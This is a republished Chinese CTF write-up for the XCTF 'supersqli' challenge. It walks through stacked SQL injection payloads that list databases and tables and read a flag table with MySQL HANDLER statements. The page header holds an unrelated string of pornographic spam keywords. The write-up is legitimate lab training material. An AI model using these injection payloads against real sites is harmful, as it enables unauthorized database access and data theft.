日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

supersqli 攻防世界

發布時間:2024/1/18 编程问答 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 supersqli 攻防世界 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

  • 一、supersqli
    • 1、查找注入點
    • 2、查看數據庫、數據表
    • 3、查看表的內容
  • 二、知識拓展
      • 1、我在mi數據庫中創建了一個數據表
      • 2、使用handler讀取數據

一、supersqli

當看到這道題時,第一下我就想到堆疊注入,因為我做過相同題目,當你們做完這題時,可以嘗試Buuctf [GYCTF2020]Blacklist這題,就相當于鞏固一下。

1、查找注入點

當我們輸入引號時,發現報錯,所以判斷存在注入

2、查看數據庫、數據表

1';show databases;#

1';show tables;#

這里查看到了兩個表

3、查看表的內容

在數據庫中查看1919810931114514這種類型時,要用``號

1';HANDLER `1919810931114514` open; HANDLER `1919810931114514` read first;#

二、知識拓展

mysql除可使用select查詢表中的數據,也可使用handler語句,這條語句使我們能夠一行一行的瀏覽一個表中的數據

1、我在mi數據庫中創建了一個數據表

2、使用handler讀取數據

總結下來就四條命令,不難,你們自己嘗試動手一下,加深印象,handler打開后要關閉,沒有關閉下次打不開

HANDLER mi open; 打開mi表

HANDLER mi read first; 閱讀表中第一行內容

handler mi read next; 閱讀表下一行內容

handler mi close; 關閉

當然,另一個表內容你們也可以使用handler查看

總結

以上是生活随笔為你收集整理的supersqli 攻防世界的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。